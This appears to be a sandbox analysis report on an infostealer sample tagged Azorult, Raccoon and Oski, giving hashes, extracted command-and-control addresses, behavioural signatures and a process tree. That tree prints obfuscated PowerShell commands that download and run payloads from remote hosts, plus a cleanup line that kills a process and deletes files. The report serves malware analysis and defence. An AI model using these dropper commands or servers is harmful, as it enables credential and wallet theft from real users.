azorult | c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53

Analysis

max time kernel
119s
max time network
118s
platform
windows7_x64
resource
win7-en-20211014
submitted
24-11-2021 12:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53.exe
Size

103KB
MD5

f88740451956d87424b84326e9e9dde7
SHA1

a0ccae106a243ad2b1d748512c3e6783b2dd2547
SHA256

c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53
SHA512

1760df8b84624fbde5b4e6447a030ce31e45bc23fb152c2a72c52b9f652283a5f3bb7557a85620943ddc3fff3c4b7071ae864783f3731c9aea390eaf7068aa06

Score

10^/10

azorult oski raccoon 7632dffeb03da57edca98c8bfb2611868e8eb0a7 discovery infostealer spyware stealer suricata trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://bit.do/e33Bx

exe.dropper

http://bit.do/e33Bx

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

raccoon

Version

1.8.3-hotfix

Botnet

7632dffeb03da57edca98c8bfb2611868e8eb0a7

Attributes

url4cnc
http://91.219.236.162/brikitiki
http://185.163.47.176/brikitiki
http://193.38.54.238/brikitiki
http://74.119.192.122/brikitiki
http://91.219.236.240/brikitiki
https://t.me/brikitiki

rc4.plain

Extracted

Family

oski

colonna.ac.ug

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M6
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M6
suricata

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\dup2patcher.dll	acprotect

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

9 996 powershell.exe
10 1088 powershell.exe
11 1824 powershell.exe
14 996 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 9 IoCs

Processes:

Patch-nb9.exexqz.exefsacvbe.execbvdsme.exexqz.exexqz.exefsacvbe.exexqz.execbvdsme.exe

pid process

1792 Patch-nb9.exe
568 xqz.exe
368 fsacvbe.exe
1704 cbvdsme.exe
1628 xqz.exe
1936 xqz.exe
1348 fsacvbe.exe
1768 xqz.exe
980 cbvdsme.exe

flow	pid	process
9	996	powershell.exe
10	1088	powershell.exe
11	1824	powershell.exe
14	996	powershell.exe

pid	process
1792	Patch-nb9.exe
568	xqz.exe
368	fsacvbe.exe
1704	cbvdsme.exe
1628	xqz.exe
1936	xqz.exe
1348	fsacvbe.exe
1768	xqz.exe
980	cbvdsme.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\dup2patcher.dll	upx

Loads dropped DLL 17 IoCs

Processes:

cmd.exePatch-nb9.exepowershell.exexqz.exepowershell.exefsacvbe.exepowershell.execbvdsme.execbvdsme.exe

pid	process
472	cmd.exe
1792	Patch-nb9.exe
1824	powershell.exe
1824	powershell.exe
568	xqz.exe
568	xqz.exe
568	xqz.exe
568	xqz.exe
996	powershell.exe
368	fsacvbe.exe
1088	powershell.exe
1704	cbvdsme.exe
980	cbvdsme.exe
980	cbvdsme.exe
980	cbvdsme.exe
980	cbvdsme.exe
980	cbvdsme.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 3 IoCs

Processes:

xqz.exefsacvbe.execbvdsme.exe

description	pid	process	target process
PID 568 set thread context of 1936	568	xqz.exe	xqz.exe
PID 368 set thread context of 1348	368	fsacvbe.exe	fsacvbe.exe
PID 1704 set thread context of 980	1704	cbvdsme.exe	cbvdsme.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cbvdsme.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cbvdsme.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1648 taskkill.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cbvdsme.exe

pid	process
1648	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
1824	powershell.exe
1088	powershell.exe
996	powershell.exe
1824	powershell.exe
1824	powershell.exe
996	powershell.exe
996	powershell.exe
1088	powershell.exe
1088	powershell.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

xqz.exefsacvbe.execbvdsme.exe

pid process

568 xqz.exe
368 fsacvbe.exe
1704 cbvdsme.exe

pid	process
568	xqz.exe
368	fsacvbe.exe
1704	cbvdsme.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	1824	powershell.exe
Token: SeDebugPrivilege	996	powershell.exe
Token: SeDebugPrivilege	1648	taskkill.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

xqz.exefsacvbe.execbvdsme.exexqz.exexqz.exe

pid process

568 xqz.exe
368 fsacvbe.exe
1704 cbvdsme.exe
1628 xqz.exe
1768 xqz.exe

pid	process
568	xqz.exe
368	fsacvbe.exe
1704	cbvdsme.exe
1628	xqz.exe
1768	xqz.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53.execmd.exemshta.exemshta.exemshta.exepowershell.exexqz.exepowershell.exefsacvbe.exepowershell.exe

description	pid	process	target process
PID 792 wrote to memory of 472	792	c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53.exe	cmd.exe
PID 792 wrote to memory of 472	792	c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53.exe	cmd.exe
PID 792 wrote to memory of 472	792	c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53.exe	cmd.exe
PID 792 wrote to memory of 472	792	c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53.exe	cmd.exe
PID 472 wrote to memory of 1116	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 1116	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 1116	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 1116	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 288	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 288	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 288	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 288	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 1516	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 1516	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 1516	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 1516	472	cmd.exe	mshta.exe
PID 472 wrote to memory of 1792	472	cmd.exe	Patch-nb9.exe
PID 472 wrote to memory of 1792	472	cmd.exe	Patch-nb9.exe
PID 472 wrote to memory of 1792	472	cmd.exe	Patch-nb9.exe
PID 472 wrote to memory of 1792	472	cmd.exe	Patch-nb9.exe
PID 472 wrote to memory of 1792	472	cmd.exe	Patch-nb9.exe
PID 472 wrote to memory of 1792	472	cmd.exe	Patch-nb9.exe
PID 472 wrote to memory of 1792	472	cmd.exe	Patch-nb9.exe
PID 1516 wrote to memory of 996	1516	mshta.exe	powershell.exe
PID 1516 wrote to memory of 996	1516	mshta.exe	powershell.exe
PID 1516 wrote to memory of 996	1516	mshta.exe	powershell.exe
PID 1516 wrote to memory of 996	1516	mshta.exe	powershell.exe
PID 288 wrote to memory of 1824	288	mshta.exe	powershell.exe
PID 288 wrote to memory of 1824	288	mshta.exe	powershell.exe
PID 288 wrote to memory of 1824	288	mshta.exe	powershell.exe
PID 288 wrote to memory of 1824	288	mshta.exe	powershell.exe
PID 1116 wrote to memory of 1088	1116	mshta.exe	powershell.exe
PID 1116 wrote to memory of 1088	1116	mshta.exe	powershell.exe
PID 1116 wrote to memory of 1088	1116	mshta.exe	powershell.exe
PID 1116 wrote to memory of 1088	1116	mshta.exe	powershell.exe
PID 1824 wrote to memory of 568	1824	powershell.exe	xqz.exe
PID 1824 wrote to memory of 568	1824	powershell.exe	xqz.exe
PID 1824 wrote to memory of 568	1824	powershell.exe	xqz.exe
PID 1824 wrote to memory of 568	1824	powershell.exe	xqz.exe
PID 568 wrote to memory of 368	568	xqz.exe	fsacvbe.exe
PID 568 wrote to memory of 368	568	xqz.exe	fsacvbe.exe
PID 568 wrote to memory of 368	568	xqz.exe	fsacvbe.exe
PID 568 wrote to memory of 368	568	xqz.exe	fsacvbe.exe
PID 568 wrote to memory of 1704	568	xqz.exe	cbvdsme.exe
PID 568 wrote to memory of 1704	568	xqz.exe	cbvdsme.exe
PID 568 wrote to memory of 1704	568	xqz.exe	cbvdsme.exe
PID 568 wrote to memory of 1704	568	xqz.exe	cbvdsme.exe
PID 996 wrote to memory of 1628	996	powershell.exe	xqz.exe
PID 996 wrote to memory of 1628	996	powershell.exe	xqz.exe
PID 996 wrote to memory of 1628	996	powershell.exe	xqz.exe
PID 996 wrote to memory of 1628	996	powershell.exe	xqz.exe
PID 568 wrote to memory of 1936	568	xqz.exe	xqz.exe
PID 568 wrote to memory of 1936	568	xqz.exe	xqz.exe
PID 568 wrote to memory of 1936	568	xqz.exe	xqz.exe
PID 568 wrote to memory of 1936	568	xqz.exe	xqz.exe
PID 568 wrote to memory of 1936	568	xqz.exe	xqz.exe
PID 368 wrote to memory of 1348	368	fsacvbe.exe	fsacvbe.exe
PID 368 wrote to memory of 1348	368	fsacvbe.exe	fsacvbe.exe
PID 368 wrote to memory of 1348	368	fsacvbe.exe	fsacvbe.exe
PID 368 wrote to memory of 1348	368	fsacvbe.exe	fsacvbe.exe
PID 368 wrote to memory of 1348	368	fsacvbe.exe	fsacvbe.exe
PID 1088 wrote to memory of 1768	1088	powershell.exe	xqz.exe
PID 1088 wrote to memory of 1768	1088	powershell.exe	xqz.exe
PID 1088 wrote to memory of 1768	1088	powershell.exe	xqz.exe

C:\Users\Admin\AppData\Local\Temp\c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53.exe
"C:\Users\Admin\AppData\Local\Temp\c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:792

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\EB1A.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:472

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EB1A.tmp\546897459.hta"
3⤵
- Suspicious use of WriteProcessMemory
PID:1116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$npadigy = Get-Random -Min 3 -Max 4;$coprsqtmd = ([char[]]([char]97..[char]122));$utqfscbxh = -join ($coprsqtmd | Get-Random -Count $npadigy | % {[Char]$_});$gneym = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$ympekafs = $utqfscbxh + $gneym;$lcjfzwmk=[char]0x53+[char]0x61+[char]0x4c;$gvabtxz=[char]0x49+[char]0x45+[char]0x58;$ykrcpi=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL qucmgwsve $lcjfzwmk;$ruhkjw=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;qucmgwsve hbgrst $gvabtxz;$tmyhezgdac=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|hbgrst;qucmgwsve ezyftwlpxijv $ykrcpi;$pgbsknxmfy = $tmyhezgdac + [char]0x5c + $ympekafs;;;;$wftxhgbkup = 'aHR0cDovL2JpdC5kby9lMzNCcg==';$wftxhgbkup=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($wftxhgbkup));$gxhzkab = New-Object $ruhkjw;$ftsouwdr = $gxhzkab.DownloadData($wftxhgbkup);[IO.File]::WriteAllBytes($pgbsknxmfy, $ftsouwdr);ezyftwlpxijv $pgbsknxmfy;;$xvneyqgr = @($vhbkwatp, $yilcegqnaru, $gxdrwlyhtk, $dqkucgyeas);foreach($ylcgumvzn in $xvneyqgr){$null = $_}""
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1088

C:\Users\Public\xqz.exe
"C:\Users\Public\xqz.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1768

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EB1A.tmp\89465456.hta"
3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$npadigy = Get-Random -Min 3 -Max 4;$coprsqtmd = ([char[]]([char]97..[char]122));$utqfscbxh = -join ($coprsqtmd | Get-Random -Count $npadigy | % {[Char]$_});$gneym = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$ympekafs = $utqfscbxh + $gneym;$lcjfzwmk=[char]0x53+[char]0x61+[char]0x4c;$gvabtxz=[char]0x49+[char]0x45+[char]0x58;$ykrcpi=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL bsrucof $lcjfzwmk;$ruhkjw=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;bsrucof pjwasi $gvabtxz;$tmyhezgdac=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pjwasi;bsrucof vngqajdhxmbksl $ykrcpi;$pgbsknxmfy = $tmyhezgdac + [char]0x5c + $ympekafs;;;;$wftxhgbkup = 'aHR0cDovL29wZXNqay51Zy9hc2RmLkVYRQ==';$wftxhgbkup=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($wftxhgbkup));$gxhzkab = New-Object $ruhkjw;$ftsouwdr = $gxhzkab.DownloadData($wftxhgbkup);[IO.File]::WriteAllBytes($pgbsknxmfy, $ftsouwdr);vngqajdhxmbksl $pgbsknxmfy;;$xvneyqgr = @($vhbkwatp, $yilcegqnaru, $gxdrwlyhtk, $dqkucgyeas);foreach($ylcgumvzn in $xvneyqgr){$null = $_}""
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1824

C:\Users\Public\xqz.exe
"C:\Users\Public\xqz.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:568

C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
"C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:368

C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
"C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe"
7⤵
- Executes dropped EXE
PID:1348

C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe
"C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1704

C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe
"C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 980 & erase C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe & RD /S /Q C:\\ProgramData\\527990169545535\\* & exit
8⤵
PID:628

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 980
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\Users\Public\xqz.exe
"C:\Users\Public\xqz.exe"
6⤵
- Executes dropped EXE
PID:1936

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EB1A.tmp\54686754.hta"
3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1516

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$npadigy = Get-Random -Min 3 -Max 4;$coprsqtmd = ([char[]]([char]97..[char]122));$utqfscbxh = -join ($coprsqtmd | Get-Random -Count $npadigy | % {[Char]$_});$gneym = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$ympekafs = $utqfscbxh + $gneym;$lcjfzwmk=[char]0x53+[char]0x61+[char]0x4c;$gvabtxz=[char]0x49+[char]0x45+[char]0x58;$ykrcpi=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL lskybn $lcjfzwmk;$ruhkjw=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;lskybn lpiftacswu $gvabtxz;$tmyhezgdac=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|lpiftacswu;lskybn gydjurelmf $ykrcpi;$pgbsknxmfy = $tmyhezgdac + [char]0x5c + $ympekafs;;;;$wftxhgbkup = 'aHR0cDovL2JpdC5kby9lMzNCeA==';$wftxhgbkup=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($wftxhgbkup));$gxhzkab = New-Object $ruhkjw;$ftsouwdr = $gxhzkab.DownloadData($wftxhgbkup);[IO.File]::WriteAllBytes($pgbsknxmfy, $ftsouwdr);gydjurelmf $pgbsknxmfy;;$xvneyqgr = @($vhbkwatp, $yilcegqnaru, $gxdrwlyhtk, $dqkucgyeas);foreach($ylcgumvzn in $xvneyqgr){$null = $_}""
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:996

C:\Users\Public\xqz.exe
"C:\Users\Public\xqz.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1628

C:\Users\Admin\AppData\Local\Temp\EB1A.tmp\Patch-nb9.exe
Patch-nb9.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1792

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\EB1A.tmp\54686754.hta
MD5
5e0b83801fa4886fd46875ae3a41b1ac

SHA1
ed43bed966b468947a45639dc658ec2bf19f2809

SHA256
0af01305bb30f2f02814d819a1611b7f19d814ebf23a8b9a4a1573cb94fadba2

SHA512
39747d8cb05c058e10485834e489c1fa4d6e99a95c13f7c2499dc6fe385698c02d222f855277d7ec2f6c30eb4b9446e5c62aa53cf21ca677d23f298f9f94ca27

Download Submit
C:\Users\Admin\AppData\Local\Temp\EB1A.tmp\546897459.hta
MD5
494b1b06327accca63dafccbf8f8a67a

SHA1
d77a33d31f025ceebce9e1a64758cb35f8b7676c

SHA256
21fe0379c4df558b3cd2874200a812af7741e6edfa54b88c852ce1f42e2a683a

SHA512
15a23bcdc5595d48e5e9558a2d70133739e38ba081abfe0d6548af238e2276999377edfa7aa1ff9aceaaa49bafbe08b62a9189ee2f3df8fdcd7af46e03a1d6ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\EB1A.tmp\89465456.hta
MD5
455f7162de92d00a80bf49a51bd559d2

SHA1
53c5d138507941817c8e1702113d7e78b85e74a2

SHA256
261393c726f2eb67fab94ec3031bf2144b8e1c01aaa1ffe2fbb49e502f1a8f8c

SHA512
06b681397236e36ac3b2394e4e948b1da8a74546d5cc9bb4c7bcba0b6d2d385d771a25013dfa9e440e39b1574a2c8ac9e4083d0acdebe025d3649b0d64b8f638

Download Submit
C:\Users\Admin\AppData\Local\Temp\EB1A.tmp\Patch-nb9.exe
MD5
50a3f5f228bcc21b4c3487b882672ebd

SHA1
facd0a9ec9d4deb17519ad4b5c1e1a298c51e8bd

SHA256
d5d2404d1162f37d09d9da2c920250503fcfca10e136fdf376cb2bab552973c9

SHA512
b3bf2726b3404755e608cba5f1c7464640166a93ad29a84a6658a889534d7088a2eaf70df1f9cd0debe104000b51f543313206b231b20a7d283fba0f3697d1ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\EB1A.tmp\Patch-nb9.exe
MD5
50a3f5f228bcc21b4c3487b882672ebd

SHA1
facd0a9ec9d4deb17519ad4b5c1e1a298c51e8bd

SHA256
d5d2404d1162f37d09d9da2c920250503fcfca10e136fdf376cb2bab552973c9

SHA512
b3bf2726b3404755e608cba5f1c7464640166a93ad29a84a6658a889534d7088a2eaf70df1f9cd0debe104000b51f543313206b231b20a7d283fba0f3697d1ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\EB1A.tmp\start.bat
MD5
46ca3b99bf1d8afc13591f1a2ad225c0

SHA1
f22241738695d3f4dac7c29b12e3ef1391bc496f

SHA256
ae721a6eea339043b06026ce890d9805e04afa25c72603647fbfe48c1724f4b7

SHA512
5a8967b3deb1ac3decc43579b4797e14ec0efbb54b5ea6c6126c8cc640788d491237fb4daed01095f896dfab98796f1766c789c664e03da087ed9e80315e0891

Download Submit
C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe
MD5
af4f7630f1e292f5d6a4e7157c662550

SHA1
d74428bab94698e8f71134f2ce0020403e16ccc8

SHA256
b5f94e330b47c0dcf0e748af9e3e9a030d0c678301eb4ba5c391ad650ecf146a

SHA512
b893918c1add4f44a47d5ab20f983bcfdac04c747226f7c6b57f749d0c28942d95818d5b3127bc9e38ba83ac3107fe5ec479920347814ebc1702962428bcceba

Download Submit
C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe
MD5
af4f7630f1e292f5d6a4e7157c662550

SHA1
d74428bab94698e8f71134f2ce0020403e16ccc8

SHA256
b5f94e330b47c0dcf0e748af9e3e9a030d0c678301eb4ba5c391ad650ecf146a

SHA512
b893918c1add4f44a47d5ab20f983bcfdac04c747226f7c6b57f749d0c28942d95818d5b3127bc9e38ba83ac3107fe5ec479920347814ebc1702962428bcceba

Download Submit
C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe
MD5
af4f7630f1e292f5d6a4e7157c662550

SHA1
d74428bab94698e8f71134f2ce0020403e16ccc8

SHA256
b5f94e330b47c0dcf0e748af9e3e9a030d0c678301eb4ba5c391ad650ecf146a

SHA512
b893918c1add4f44a47d5ab20f983bcfdac04c747226f7c6b57f749d0c28942d95818d5b3127bc9e38ba83ac3107fe5ec479920347814ebc1702962428bcceba

Download Submit
C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
MD5
a78c23397c81f5e49296b6ff5b956928

SHA1
1b6ab1769e58c21c9cd6aa343379fbe5cefda526

SHA256
bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

SHA512
c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
MD5
a78c23397c81f5e49296b6ff5b956928

SHA1
1b6ab1769e58c21c9cd6aa343379fbe5cefda526

SHA256
bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

SHA512
c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
MD5
a78c23397c81f5e49296b6ff5b956928

SHA1
1b6ab1769e58c21c9cd6aa343379fbe5cefda526

SHA256
bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

SHA512
c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
f5ecc70049b56f411bcfbc784a275ec8

SHA1
d84a2d1dc055ddf052aaa8877fa4731d1d0b1a3f

SHA256
b939e68fc9691d3019b101ec8917e6f9f9b054f3b8ba96934ff29219ca2a6652

SHA512
f43333a7bef11d8c4d3299ffb160eb7f884c2bd7d16d125946e87ee3922cad019f214841ac09e81aeb212bf19e62a4427693e3f61eb182fb9589ee9239d8fdc7

Download Submit
C:\Users\Public\xqz.exe
MD5
a3cc781be4a0cc75f14ce69b59f8c99f

SHA1
9c13ea485984c9e75196c4d0bd871b1b7dc72017

SHA256
e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

SHA512
bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

Download Submit
C:\Users\Public\xqz.exe
MD5
a3cc781be4a0cc75f14ce69b59f8c99f

SHA1
9c13ea485984c9e75196c4d0bd871b1b7dc72017

SHA256
e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

SHA512
bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

Download Submit
C:\Users\Public\xqz.exe
MD5
a3cc781be4a0cc75f14ce69b59f8c99f

SHA1
9c13ea485984c9e75196c4d0bd871b1b7dc72017

SHA256
e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

SHA512
bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

Download Submit
C:\Users\Public\xqz.exe
MD5
a3cc781be4a0cc75f14ce69b59f8c99f

SHA1
9c13ea485984c9e75196c4d0bd871b1b7dc72017

SHA256
e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

SHA512
bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

Download Submit
C:\Users\Public\xqz.exe
MD5
a3cc781be4a0cc75f14ce69b59f8c99f

SHA1
9c13ea485984c9e75196c4d0bd871b1b7dc72017

SHA256
